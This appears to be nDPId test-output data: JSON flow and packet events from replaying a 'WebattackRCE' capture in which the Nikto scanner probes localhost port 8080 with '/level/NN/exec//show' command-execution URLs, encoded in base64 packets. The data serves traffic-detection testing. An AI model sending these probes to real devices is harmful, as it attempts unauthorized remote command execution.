-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 